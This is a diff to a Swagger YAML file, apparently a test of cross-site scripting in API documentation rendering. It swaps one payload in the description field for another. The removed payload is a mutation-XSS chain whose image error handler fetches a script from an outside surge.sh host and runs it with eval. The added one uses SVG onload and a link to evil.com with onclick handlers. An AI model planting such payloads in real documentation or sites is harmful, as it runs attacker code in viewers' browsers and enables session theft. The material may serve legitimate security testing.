--- a/teste.yaml
+++ b/teste.yaml
@@ -1,7 +1,7 @@
 swagger: '2.0'
 info:
   title: Classic API Resource Documentation
-  description: <math><mtext><h1 onerror='alert(document.domain)'><a onerror='alert(document.domain)'><h6 onerror='alert(document.domain)'></a></h6><mglyph><svg><mtext><textarea><a title='</textarea><img src onerror=fetch(`https://exuberant-ice.surge.sh/script.js`).then(function(res){res.text().then(function(data){eval(data)})})>'></textarea></h1>""></textarea></desc></textarea></mtext></mtext></svg></mglyph></option></mtext></math>
+  description:  <Svg Only=1 OnLoad=confirm(1)> <a href='https://evil.com' onclick='alert(1)'>> CLICK HERE</a >
   version: production
 basePath: /JSSResource/
 produces:
